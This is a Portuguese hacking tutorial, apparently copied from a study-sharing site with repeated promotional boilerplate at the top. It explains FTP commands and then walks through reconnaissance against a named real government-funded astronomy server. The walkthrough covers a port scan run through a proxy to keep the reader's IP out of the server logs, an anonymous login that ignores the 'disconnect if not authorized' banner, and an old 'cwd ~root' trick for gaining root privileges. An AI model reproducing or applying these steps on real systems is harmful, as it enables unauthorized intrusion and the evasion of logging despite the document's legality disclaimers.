Buscar

invadindo um servidor ftp

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 3, do total de 38 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 6, do total de 38 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 9, do total de 38 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Prévia do material em texto

CONTEUDO 
 
 O que é FTP 
- Conceitos básicos 
- Cliente/Servidor 
- Porta padrão 
- Como conectar 
- Comandos 
- TraDução de nome de arquivos 
- Mensagens FTP 
 
 Servidor alvo 
- Sobre o servidor que envia dados para NASA 
 
 Visualizando o servidor FTP com proxy 
- Webexploiter 
- Como pegar o IP do servidor 
- Procurando portas abertas 
- Visualizando FTP de uma forma segura 
 
 Visualizando os arquivos do FTP diretamente de seu computador 
- Como pegar o IP 
- Verificando se a porta 21 está aberta 
- Logando no servidor 
- Definindo um diretório local 
- Listando diretórios 
- Abrindo diretórios e listando arquivos 
- Procurando arquivos ocultos 
- Baixando arquivos do servidor 
- Enviando arquivo para o servidor 
- Visualizando o arquivo do Banner 
- Analisando os arquivos 
- Restrições 
 
 Enviando comandos diretamente para o servidor 
- Entendendo os comandos 
- Logando no Sistema 
- Sistema operacional 
- Conexão de Dados 
- Comandos que utilizam conexão de dados 
 
 FTP via TELNET 
- Conexão direta com o servidor 
 
- Conexão de rede via FTP 
- Como criar uma conexão de rede com o servidor 
 
 FTP UNIX 
- Usuários 
- Navegação 
- Principais comandos UNIX 
- Modificando os permissões 
- Principais diretórios 
 
- Senhas e Exploits 
- Login anônimo 
- Logar como root 
- Diretório das senhas 
- Decriptografando uma senha 
- Quebrando uma senha 
- Exploits UNIX 
- BuG DE PHF 
- Principais Falhas de FTP 
 
 
 
PREFÁCIOPREFÁCIOPREFÁCIOPREFÁCIO 
 
 
Atualmente invadir um servidor de FTP não é mais uma tarefa facio. 
Os sistemas operacionais, protocolos evoluíram, muitos bugs foram 
corrigidos. Mas ainda esta longe de ser perfeito, existem muitas falhas, 
formas de invasão. O que não existe mais são as formulas prontas do tipo 
“use este script que você esta dentro do servidor” 
Para você conseguir entrar em um servidor FTP, antes de tudo você 
precisa saber como ele funciona, quais as vulnerabilidades do servidor e 
de seu sistema operacional, conhecer a fundo o protocolo FTP, seus 
comandos, ou seja, é preciso realmente estudar. 
O propósito desta apostila é este, estudar o funcionamento e 
vulnerabilidades de um servidor FTP. Eu usei um servidor Americano que 
envia dados para NASA como exemplo, deixei tudo passo a passo como 
logar e navegar no servidor, porem quero deixar claro que não tem nada 
de ilegal, o servidor tem suas proteções como veremos mais adiante. Não 
estou promovendo nenhum tipo de crime virtual, usem isto para aumentar 
seu conhecimento em segurança, lembrando que se você mudar um byte 
de um servidor que você não tem autorização é crime. 
 
 
 
 
Rackerox 
rackerox@hotmail.com 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
O QUE É FTP 
 
FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma 
bastante rápida e versátil de transferir arquivos, sendo uma das mais usadas na internet. 
Um Website precisa de um servidor FTP para “guardar” seus arquivos. Quando você visita um site 
na internet, você esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu 
computador. 
 Se você tiver acesso ao servidor FTP de um site, você terá acesso aos arquivos deste site, e mais 
se você estiver logado o FTP você poderá mudar os arquivos 
 
Primeiramente vamos entender alguns conceitos. 
Para existir uma comunicação entre computadores é necessário: 
-Um endereço de cada computador (IP) 
-Um linguagem que os dois computadores entendam ( protocolos) 
-Como são vários serviços ao mesmo tempo,exemplo chat ,site ,remote, etc...Cada serviço precisa ter uma 
porta especifica, caso contrario os dados de um serviço iriam ser recebidos por outros. 
 
Cliente / Servidor 
 Sem complicar...o conceito é simples: 
Cliente é o seu programa de ftp que esta no seu computador. 
Servidor é o que está hospedado junto com o site. 
(você também pode criar um servidor em seu computador) 
O Servidor remoto aceita uma conexão de controle do cliente local. O cliente envia comandos para o servidor 
e a conexão persiste ao longo de toda a sessão (tratando-se assim de um protocolo que usa o TCP).O servidor 
cria uma conexão de dados para a transferência de dados, sendo criada uma conexão para cada arquivo 
transferido. Estes dados são transferidos do servidor para o cliente e vice e versa. 
Os comandos estão separados dos dados e o cliente pode enviar comandos durante a transferência de dados. O 
encerramento da conexão indica o fim do arquivo. 
 
Porta padrão 
A porta padrão para FTP é a porta 21 
 
Como conectar 
Existem vários Programas de cliente FTP, mas eles apenas servem para manutenção de sites. O melhor 
programa mesmo são os clientes que não usam interface gráfica, eles funcionam com linha de comando, 
funcionam no MS-DOS ou no Prompt de Comando no windows. 
 Vamos fazer um conexão com um servidor FTP usando o programa de FTP que existe no windows XP.Este 
programa não tem interface gráfica, ele roda no Prompt de comando. 
Para abrir o prompt de comando vá em executar e digite cmd. 
Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora você 
esta com o programa aberto, é preciso aprender os comandos. 
 
Comandos FTP 
Estes comandos funcionam com você logado no servidor.Você terá controle total sobre os arquivos 
hospedados. 
 
 
 
 
 
COMANDO SINTAXE DESCRIÇÃO 
! ! COMANDO 
Executa COMANDO na máquina local. 
No prompt do ftp, os comandos digitados são, a princípio, 
executados na máquina remota. Para executar um comando na 
máquina local preceda o mesmo com o ! 
ascii ascii 
Configura o tipo de transferência de arquivos para ASCII. É o valor 
padrão 
bell bell Emite um bip quando um comando é completado 
binary binary Configura o tipo de transferência de arquivos para binário. 
bye bye Encerra a sessão ftp e retorna ao interpretador de comandos 
cd cd DIRETÓRIO Muda o diretório de trabalho para DIRETÓRIO 
cdup cdup Muda para o diretório que está um nível acima do diretótio atual 
chmod chmod MODO ARQUIVO Altera as permissões de ARQUIVO de acordo com MODO. 
close close Encerra a sessão ftp e retorna ao interpretador de comandos 
delete delete ARQUIVO Apaga ARQUIVO 
dir dir DIRETÓRIO ARQUIVO-LOCAL 
Lista o conteúdo de DIRETÓRIO colocando o resultado em 
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se 
DIRETÓRIO não for especificado, será listado o conteúdo do 
diretório atual. Se ARQUIVO-LOCAL não for especificado a 
listagem será enviada para a tela. 
get 
get ARQUIVO-REMOTO ARQUIVO-
LOCAL 
Baixa ARQUIVO-REMOTO para sua máquina com o nome de 
ARQUIVO-LOCAL. Se ARQUIVO-LOCAL não for especificado o 
arquivo será baixado com o mesmo nome que tem na máquina remota. 
help help COMANDO 
Descreve sumariamente o COMANDO. Se este não for especificado 
será exibida a lista de todos os comandos. 
lcd lcd DIRETÓRIO Muda o diretório de trabalho na máquina local. 
ls ls DIRETÓRIO ARQUIVO-LOCAL 
Lista o conteúdo de DIRETÓRIO colocando o resultado em 
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se 
DIRETÓRIO não for especificado, será listado o conteúdo do 
diretório atual. Se ARQUIVO-LOCAL não for especificado a 
listagem será enviada para a tela. 
mdelete mdelete ARQUIVOS Apaga ARQUIVOS 
mdir 
mdir DIRETÓRIOS ARQUIVO-
LOCAL Semelhante a dir, porém lista o conteúdo de vários diretórios 
mget mget ARQUIVOS Semelhante a get, porém baixa vários arquivos 
mkdir mkdir DIRETÓRIO Cria um diretório com o nome de DIRETÓRIO 
mls 
mls DIRETÓRIOS ARQUIVO-
LOCAL Semelhante a ls, porém lista o conteúdo de vários diretórios 
mode mode MODO Configura o modo de transferência de arquivos para MODO. O modo 
padrão é "stream" 
modtime modtime ARQUIVO Exibe a hora da última modificação de ARQUIVO 
mput mput ARQUIVOS Semelhante a put, porém envia vários arquivos 
newer 
newer ARQUIVO-REMOTO 
ARQUIVO-LOCAL 
Substitui o ARQUIVO-LOCAL pelo ARQUIVO-REMOTO se a hora 
de modificação do ARQUIVO-REMOTO for mais recente 
nlist 
nlist DIRETÓRIOS ARQUIVO-
LOCAL Semelhantea nls 
put 
put ARQUIVO-LOCAL ARQUIVO-
REMOTO 
Envia ARQUIVO-LOCAL para o servidor ftp nomeando-o como 
ARQUIVO-REMOTO. Se ARQUIVO-REMOTO não for 
especificado o arquivo será enviado com o nome de ARQUIVO-
LOCAL 
pwd pwd Exibe o caminho completo(PATH) do diretório atual 
quit quit Semelhante a bye 
recv recv ARQUIVO-REMOTO Semelhante a get 
ARQUIVO-LOCAL 
reget 
reget ARQUIVO-REMOTO 
ARQUIVO-LOCAL 
Semelhante a get com a diferença que se ARQUIVO-LOCAL existe 
e é menor que ARQUIVO-REMOTO, reget considera que 
ARQUIVO-LOCAL é ARQUIVO-REMOTO parcialmente 
transferido e contiua a transferência do arquivo. Muito útil quando se 
baixa arquivos grandes. 
remotehelp 
rhelp 
remotehelp COMANDO 
rhelp COMANDO Semelhante a help, porém solicita ajuda ao servidor ftp 
remotestatus 
rstatus 
remotestatus ARQUIVO 
rstatus ARQUIVO 
Exibe a situação de ARQUIVO. Se ARQUIVO não for especificado, 
exibe a situação da máquina remota. 
rename 
rename NOME-ANTIGO NOME-
NOVO 
Renomeia um arquivo 
rmdir rmdir DIRETÓRIO Apaga DIRETÓRIO 
send 
send ARQUIVO-LOCAL ARQUIVO-
REMOTO Semelhante a put 
size size ARQUIVO Exibe o tamanho de ARQUIVO 
status status Exibe a situação atual do servidor ftp 
system system Exibe o tipo de sistema operacional da máquina remota 
type type TIPO 
Configura o tipo de transferência de arquivos para TIPO. O padrão é 
ASCII. Se TIPO não for especificado, será mostrada a configuração 
atual 
? ? COMANDO Semelhante a help 
 
 
 
 
 
Tradução de nomes de arquivos 
A sintaxe dos nomes dos arquivos pode ser incompatível entre diferentes Sistemas Operacionais. O UNIX usa 
128 caracteres, maiúsculas e minúsculas, enquanto que o DOS usa 8 + 3 caracteres e apenas maiúsculas. 
Certos nomes não podem ser usados em alguns sistemas. Devido a isto tudo o BSD ftp define regras para a 
tradução de nomes. 
 
 
 
Mensagens FTP 
O FTP permite dois modos de transferência de mensagens FTP: texto (com traduções apropriadas) ou binário 
(sem tradução). Cada mensagem do servidor inclui um identificador decimal de 3 dígitos (exemplo: 226 
Transfer complete). Estas mensagens podem ser vistas ou não, usando para isso o modo verbose ou quiet, 
respectivamente. 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
SERVIDOR ALVO 
 
 Antes de tudo quero deixar claro que isto não é uma invasão ilegal, o servidor possui suas 
proteções, mas adiante vocês vão perceber. 
 Vamos ver passo a passo como chegar até os arquivos de dentro do servidor. 
 Site alvo: http://ned.ipac.caltech.edu/ 
 
 
 
 
É uma base de dados do Governo Americano coordenada pelo Instituto de 
tecnologia da Califórnia que fornece dados físicos e bibliográficos (coordenadas, 
parâmetros astronômicos e posição num mapa estelar) para NASA. 
 É um laboratório de dados extragalácticos. 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Visualizando o servidor FTP com Proxy 
 
 
Agora vamos “exploitar” o site com um Exploiter on line: http://www.webexploiter.com 
 
 
1º) Pegar o IP do site 
 Abra o webexploiter e vai em ping, vamos pingar o servidor. 
 Escolha a opção http delete o “www” e digite apenas: 
ned.ipac.caltech.edu 
como nesta imagem: 
 
Clique em “ping it” 
Pronto agora temos o IP do servidor: 
 
Observe que a resposta do Ping vem com o IP: 
134.4.10.118 
 
2º) Procurando Portas abertas no Servidor: 
Neste mesmo exploiter vamos fazer um scan de portas no IP que a gente pegou. 
Basta ir em PORT SCAN, selecionar todas as portas e colar o IP: 
 
Depois clique em SCAN 
 
Observe que o servidor responde nas portas 80 e 21 
 
 
 
A porta 21 por padrão é a porta de FTP 
 
3º) Visualizando o FTP de uma forma Segura: 
Agora sabendo que a porta 21 esta aberta, podemos conectar no FTP 
Este mesmo exploiter possibilita que você veja arquivos em FTPs que permitem login anônimo: 
Basta clicar em FTP > Visualize FTP (login anônimo) 
Colar o IP 
 
Clique em START 
 
Observe: 
 
Ai está os diretórios do FTP 
Você pode navegar e baixar o que você quiser, têm estudos de galáxias, dados do telescópio hubble. 
Como da para perceber é server UNIX. Os arquivos ai rodam no linux mas da para visualizar no windows sem 
problema. 
 Arquivos “.gz” são arquivos compactados o Winzip e o Winrar descompacta no windows. 
 Arquivos “.dat” é só renomear para “.txt” que você verá os dados. 
 
Apesar do FTP estar permitindo login anônimo a NASA não fez isto para todo mundo ficar mexendo, eles 
deixaram um banner dizendo que se você não tem autorização pra entrar no FTP é para desconectar: 
“If you are not authorized to access this system, disconnect now.” 
Procure na pasta “msgs” que você vai localizar o banner.txt 
 
 
 
 
 
 
Vantagem de visializar FTP primeiro no Webexploiter. 
 
É mais prático e você protege seu IP do log do servidor. 
Observe que neste servidor da nasa os IPs de quem loga fica registrado, se você deletar algum 
arquivo, é crime. 
 
 
Eu não sei se este é o LOG deles, mas pode ter certeza que o servidor tem um. 
Quando você entra com o Webexploiter você conecta via Proxy. 
O seu IP passa a ser: 67.15.221.2 
 
Olhe da onde é este IP: 
 
City: Houston 
State: TX 
Country: US 
Postal code: 77060 
Area code: 281 
Lá no Texas, bem longe da sua casa. 
Alem do FTP, o Ping e o Port Scan não partem de seu computador. 
Da para você vasculhar o servidor no anonimato. 
Mas ele é apenas um Scan, não é um site de invasão, depois de scanear se você quiser invadir pra valer ai é 
outra historia. 
 
 
Visualizando os arquivos do FTP diretamente de 
seu computador 
 
Eu não vou colocar senhas do site, existem muitos meios de quebrar uma senha de FTP, vou deixar apenas um 
login de UNIX que funciona, mas tem permissão restrita. 
A gente já tem todos os dados necessários, mas vou fazer tudo dinovo passo a passo pelo Prompt de 
Comando. 
 
 
1º) Pegar o IP com o Ping 
ping ned.ipac.caltech.edu 
 
 
2º) Verificar se a porta 21 (FTP) está aberta. 
Vamos usar o Telnet (no Ruindows XP, o vista não tem) 
Digite: 
telnet 
o 134.4.10.118 21 
 
Você vai verificar que existe conexão e que agora as coisas ficam um pouco mais sérias, olhe a mensagem: 
 
Digite quit duas vazes e saia do telnet 
 
4º) Logando no FTP 
Agora sabendo que a porta de FTP esta aberta, vamos entrar no programa de FTP do Ruindows. 
Basta digitar FTP e dar enter 
 
-agora vamos logar, digite: 
o 134.4.10.118 
Note que o servidor manda uma mensagem dizendo que o computador pertence ao Governo Americano, é 
operado pelo instituto de tecnologia da califórnia e se você não tem autorização para estar ali é para 
desconectar agora. 
E depois pede o usuário 
 
Aperte enter, vai dar falha de logon, mas tudo bem 
 
Agora digite: 
quote user ftp 
Observe, ele aceita este usuário e pede o Password 
 
Agora digite: 
quote pass ftp 
Olha que bunito xD, você esta dentro do servidor da NASA. 
 
 
 
 
Definindo um diretório local 
Primeiramente teremos que definir um diretório local (em nosso computador) para o programa de 
FTP baixar e enviar os arquivos. 
-Crie uma pasta no seu desktop (eu criei a pasta “rox”) 
Agora vamos definir este diretório como diretório local. 
Use o comando lcd 
 
Agora digite 
lcd Desktop 
lcd rox 
 
 Pronto agora nossa pasta de trabalho é a pasta “rox” 
 
Listando Diretorios 
Primeiro vamos usar o comando dir 
Apesar de ser um servidor UNIX o dir vai funcionar porque é um comando de seu programa de FTP 
do windows. 
 
Agora temos a lista dos diretórios do servidor. 
bin dev etc msgs pub usr 
 
Também podemos usar o comando ls 
 
 
 
 
 
Abrindo diretórios e listando arquivos 
Para abrir um diretório vamos usar o comando cd 
Exemplo: vamos abrir o diretório “pub” 
O comando será: cd pub 
Observe que aparece a lista de todos os arquivos e diretórios que contem no diretório “pub” 
 
 
Para voltarmos um diretório acima vamos usar o comando c .. 
Não é c.. como no DOS, é c .. “C(espaço)..” 
Digite c .. e depois ls 
Observe que agora voltamos para o diretório anterior. 
 
 
Procurando arquivos ocultos 
 O legal de usar comandos ao invés de programas prontossão as opções que você tem de 
manipular um arquivo ou diretório, este é um exemplo. 
 Este servidor é UNIX, em UNIX qualquer arquivo que começa com um “.” (ponto) 
É um arquivo oculto. Este arquivo é invisível a primeira vista. E se esta oculto deve ser por algum 
motivo. 
 
Vamos analisar o diretório “pub” novamente. 
cd pub 
ls 
Agora digite o comando ls –la 
 
 
Observe a diferença na lista de arquivos 
 
 
Baixando arquivos do servidor 
Já que estamos no diretório “pub” vamos baixar um arquivo deste diretório. 
Primeiro vamos conferir nosso diretório local: comando lcd 
 
Agora vamos usar o comando get para baixar o arquivo. 
Importante: não aparecerá nenhuma caixa de download e nenhuma barra de tempo. Dependendo 
do tamanho do arquivo, vai demorar para baixar. 
Vamos baixar o arquivo lisa.txt 
Basta digitar: 
get lisa.txt 
 
Espere um pouco e abra a pasta “rox” que você criou no desktop. 
Vamos baixar um arquivo oculto, o .dat.gz 
get .dat.gz 
 
 
Você pode baixar todos os arquivos que você conseguir listar. 
Se quando você ler esta apostila os arquivos “lisa.txt e “.dat.gz” não mais existirem tente baixar 
outros. 
 
 
 
 
 
 
 
 
 
Olhe os arquivos que nos baixamos do servidor na pasta “rox” 
 
 
Enviando arquivo para o servidor 
O comando para enviar um arquivo é o comando put 
Vamos tentar enviar um arquivo para o diretório pub 
Coloque qualquer arquivo no diretório local (no nosso caso a pasta “rox”) 
Vou colocar um arquivo qualquer.. . 
Lamer_list.doc 
É um arquivo do Word 
Agora vamos tentar enviar este arquivo para o servidor, basta digitar: 
put Lamer_list.doc 
Observe: 
 
O servidor não aceitou, isto significa que o nível do seu usuário não permite “UPAR” nada para 
aquele diretório. Tente em outro diretório, mas acredito que com logim anônimo você não vai 
conseguir. Só com outro login. 
 
 
 
 
 
Visualizando o arquivo do Banner 
Lembra da mensagem do servidor? 
Esta aqui: 
 
 
 
Vamos traduzir: 
*------------------------------------------------------------------------ 
 * Este computador é financiado pelo Governo dos Estados Unidos 
 * E operado pelo California Institute of Technology 
 * De apoio ao curso U.S. Government programas e atividades. 
 * Ao continuar, você concorda com os dados que voce digitar 
 * Sendo monitorado. Os usuários deste sistema não têm nenhuma expectativa de 
 * Privacidade. 
 * Se você não está autorizado a acessar a este sistema, desconecte agora. 
*------------------------------------------------------------------------ 
 
Vamos achar o arquivo desta mensagem. 
É um arquivo de texto. 
Volte para o inicio 
cd .. 
Agora liste 
ls 
Entre no diretório msgs 
cd msgs 
liste este diretório 
ls 
Observe na imagem o arquivo banner.txt 
 
Agora vamos baixar este arquivo 
get banner.txt 
 
 
 
Agora observe nossa pasta “rox” 
 
 
 
 
Abra o arquivo banner.txt 
Surpresa: 
 
 
Você deve estar pensando: 
Então eu vou deletar este arquivo no servidor e colocar outro com minha mensagem no 
lugar dele. 
Isto é o famoso Banner Grabbing. 
O comando para deletar é o del 
E o comando para enviar arquivo é o put 
Mas as coisas não são tão simples assim, você esta logado como anônimo e sua permissão neste 
diretório é este. 
drwxr-xr-x 
você esta no terceiro grupo “xr-“ 
Ai não tem nenhum “w” significa que você só pode ler o arquivo e não pode gravar nada. 
Com login anônimo sem chance, você terá que pegar alguma senha e logar. 
 
Tem mais arquivos de banner ai, baixe eles e olhe. 
 
Analisando os arquivos 
 Eu analisei os arquivos do servidor e não achei nada de interessante. 
Só tem dados de satélite, telescópio estudos de física. 
Se fosse na guerra fria até dava para vender para União Soviética rsrs. 
 Mas da para estudar e estrutura de diretórios e arquivos UNIX 
Olhem as extensões que mais aparecem. 
.dat dat é uma abreviação de data (dados), este arquivo contem dados, neste caso dados de 
telescópio, satélite,sei la. 
 Eu renomei um deles para .txt , tinha isto: 
 
File Name: .dat, Processing Time: Thu Feb 8 04:30:00 
Output option: compact_2 
************************** SEARCH REQUESTS ****************************** 
IN_CSYS : equatorial , IN_EQUINOX : J2000.0 
OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0 
EXTENDED_NAME_SEARCH: Yes 
SORTED_BY_FIELD : Distance_to_search_center 
REDSHIFT_VELOCITY : 10000.0 
DEFAULT_RADIUS : 1.000000 
DEFAULT_BEGIN_YEAR : 1900 
DEFAULT_END_YEAR : 2006 
IAU NAME STYLE : S 
 
NEARPOSN: 
 1.4514872000d ; 54.55719600 ; 1.00 
Much care has gone into the collection of POSITIONS and VELOCITIES in 
 NED, and they are carried along with uncertainties and references to 
 their origin. These are continually over-written by more accurate 
 values as they become available. 
 
 The other "Basic Data", however -- diameters, magnitudes, flux densities, 
 cluster populations, etc -- are indicative values only, in the sense that 
 they originate in many different sources, and have not been placed on a 
 uniform scale. The main sources are catalogs and compilations, with the 
 more accurate data sets favored, and the larger ones favored at comparable 
 accuracy. No information is kept about the origin of "Basic Data". 
 
 More controlled and rigorous data collection is applied to PHOTOMETRIC 
 DATA, POSITION DATA, and REDSHIFT DATA. These measurements are carried 
 along with their uncertainties, references to their origin, and some 
 information about the data collection and processing behind them. Unlike 
 basic data, PHOTOMETRIC, POSITION, and REDSHIFT DATA are never erased or 
 updated, but should serve as a cumulative record of the measurements on 
 each object. As a future enhancement to NED, additional data frames 
 along the same lines will be introduced for kinematics, classifications, 
 and other parameters. 
A. Galaxies (G) 
 
Field 1: Morphology 
Field 2: A magnitude in the visible range, on any scale as available 
Field 3: Major axis diameter in arcmin 
Field 4: Minor axis diameter in arcmin 
 
.gz (arquivo compactado, o winzip do windows consegue descompactar) 
.txt (arquivo de texto ...) 
.c (são scripts, muito interessante) 
 
 
 
 
 
 
 
Restrições 
Quando logamos apareceu a mensagem: 
 
(restrições aplicadas) 
 
E quando digitamos dir apareceu isto. 
 
d x w são códigos de permissão para cada diretório, mas adiante eu explicarei o que significa cada 
código. 
Isto significa que não temos acesso a tudo dentro do servidor, agora você percebeu que entrar 
anônimo, não significa burlar uma senha, mas sim entrar como um usuário com um nível baixo e 
cheio de restrições. Mas, uma vês lá dentro, você pode procurar por arquivos e dados que te levam 
a senha do root ou à outros usuários. 
 
ENVIANDO COMANDOS DIRETAMENTE PARA O 
SERVIDOR 
 
Até agora fizemos um monte de comando, testes e tudo mais. Você deve estar se perguntando: 
Mas eu já enviei um monte de comandos? 
Sim, você enviou, mas não diretamente, você usou o programa cliente de ftp. 
Existe uma diferença em usar um programa de FTP e enviar comandos diretamente para o 
servidor. O programa de FTP do windows ou do Linux apenas interpreta estes comandos 
padronizados para FTP e envia para o servidor.Enviar um comando diretamente para o servidor é 
diferente. 
 
Vamos ver na pratica: 
 Digite help 
 Você vai visualizar o help do seu programa de FTP e todos os comandos que o seu programa de 
FTP interpreta. No nosso caso nosso servidor é um UNIX e ele interpreta mais comandos do que 
apenas estes de nosso programa de FTP. 
 O programa de FTP do windows tem uma espécie de “filtro” que envia uma linha de comando 
diretamente para o servidor, este “filtro” é o comando quote ou o comando literal 
 Agora digite quote help 
 Observe que aparece um monte de comandos diferentes que o servidor interpreta, mas estes 
comandos não são interpretados pelo seu programa de FTP. 
 IMAGEM 
Existe Duas formas de enviar um comando diretamente parao servidor: usando o comando quote 
ou conectando via telnet. 
Vamos usar o programa de FTP mesmo 
 
ENTENDENDO OS COMANDOS 
O protocolo FTP se baseia em comandos e respostas. 
Para enviar um comando basta enviar um texto pela conexão de controle (no nosso caso o nosso 
computador) seguido por uma nova linha (“Line Feed” ASCII 10 - 0x0A) 
Após o “Line Feed ASCII 10 - 0x0A” o servidor executará o comando e dará uma resposta. 
Formato da resposta: 
220<ASCII 32 - 0x20>Resposta do Servidor<ASCII 10 - 0x0A> 
220 (código de retorno) 
ASCII 32 - 0x20 (espaço em branco) 
ASCII 10 - 0x0A (uma linha nova) 
Se a resposta ocupar mais de uma linha o formato seguira o mesmo padrão. 
220-<Espaço>Resposta (Linha 1)<LineFeed> 
220-<Espaço>Resposta (Linha 2)<LineFeed> 
Neste formato, todas as linhas, com exceção da última, possuem um hífen (ASCII 45 - 0x2D) 
imediatamente após o código de retorno, exceto a última, que não possui hífen justamente para 
sinalizar que é a última linha da resposta. 
Então enquanto não aparecer o hífen deve-se aguardar o termino da resposta 
 
 
 
 
 
 
LOGANDO no SISTEMA 
Os comandos são simples user (para usuário) e (pass para senha) 
Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos 
diretamente para o servidor utilizando o comando quote 
quote user seuusuario 
quote pass suasenha 
 
Se você não souber nenhuma senha tente anônimo 
quote user anonymous 
quote pass rackerox@ned.ipac.... 
 
Você também pode tentar explorar uma falha antiga, mas só funciona com servidores 
antigos.quando aparecer para logar digite isto: 
quote user ftp 
depois 
quote cwd ~root ou quote cwd~sys quote cwd~sysop 
depois 
quote pass ftp 
 
O comando cwd (Change Working Directory) é usado orinalmente para abrir um diretório, neste 
caso ele iria abrir ~root ,se isto acontecer Voce estará com privilégios root, você pode fazer o que 
quiser no servidor, terá permissão para tudo, inclusive para ser preso =) 
 
SISTEMA OPERACIONAL 
Agora que já estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar 
o comando syst , como é um comando direto vamos usar quote syst 
 
Agora sabemos que é UNIX 
 
CONEXÃO DE DADOS 
Existem comandos que precisam de uma conexão de dados estabelecida, por exemplo, se for 
baixar algum arquivo do servidor é necessário estabelecer portas do computador para isto. 
O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando 
direto ao servidor teremos que estabelecer quais serão as portas que iremos usar. 
Vamos usar o comando port 
O “port” indica ao servidor quais portas serão usadas na conexão 
Neste comando, deve-se passar 6 valores separados pro vírgula. Os 4 primeiros são os dígitos do IP. 
Os outros dois valores representam a porta TCP em que será feita a conexão.para definir a porta é um pouquinho 
complicado, você terá que separar os dois bytes que compõem o valor da porta e convertê-los para decimal.Exemplo: 
Xxxxx 
Exemplo do comando port 
 
Você também pode deixar o servidor especificar qual porta será utilizada, eu acho bem melhor, ai 
você não corre o risco de especificar uma porta que já esta sendo utilizada.Para isto use o 
comando pasv 
 
Os bytes retornados nos parênteses são: os quatros primeiros são o IP, os outros dois são a porta. 
Para obter o número da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo. 
Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201). 
 
PRINCIPAIS COMANDOS que utilizam Conexão de Dados 
quote list (lista os arquivos do diretório atual no servidor) 
quote stor (Envia um arquivo para o servidor) 
quote retr (Faz o download de um arquivo do servidor) 
 
HELP 
Cuidado para não se confundir com o help, este comando lista todos os comandos do servidor, 
mas se você digita apenas help você terá os comandos do seu programa de FTP, para ver os 
comandos do servidor digite quote help 
 
 
 
Comando help (help do programa de FTP) 
 
 
 
 
 
 
 
Comando quote help (help do servidor) 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
FTP via TELNETFTP via TELNETFTP via TELNETFTP via TELNET 
 
Também podemos conectar um cliente Telnet na porta do FTP. 
Primeiro vamos abrir nosso cliente Telnet, abra o prompt de comando novamente e digite telnet 
(isto no windows XP, no vista você terá que baixar um cliente) 
Depois que você apertar enter abrira o cliente de telnet do Windows. 
 
 
Agora vamos abrir uma conexão com o servidor. 
Vamos usar o comando open : 
open ipdoservidor portadeconexao 
 
Exemplo: vamos abrir uma conexão com o IP 134.4.10.118 na porta 21 
Lembrando que a porta padrão para FTP é a porta 21. 
O comando fica assim: 
open 134.4.10.118 21 
 
 
depois de conectado vamos logar no servidor, usando comando user 
Se voce souber algum user e senha logue com ele, se não tente logar anônino 
User anonymous 
Se o servidor aceitar ele vai pedir para você completar com o passwd ou seu email, agora você usa 
o comando pass 
Mas no servidor não existe passwd para anonymous então você pode inventar um endereço de 
email usando o domínio do servidor. 
Resumindo: 
user anonymous 
pass rackerox@ipac.caltech.edu 
 
Depois só voce apertar enter que você estará logado, observe a imagem. 
 
 
 
Agora digite help 
Vai aparecer uma lista de comandos. Esta lista de comandos não é do seu cliente de telnet, mas 
sim do servidor que você esta acessando. 
Observe que tem a assinatura do root: root@rad.ipac.caltech.edu 
 
 
 
 
 
Via telnet você terá uma conexão direta com o servidor, isto significa que você não precisa mais do 
quote, e também que aqueles comandos do programa de FTP não funcionará aqui. 
Aqui só vão funcionar os comandos do servidor. 
 
Para encerrar a conexão, basta digitar quit 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Conexão de rede via FTPConexão de rede via FTPConexão de rede via FTPConexão de rede via FTP 
 
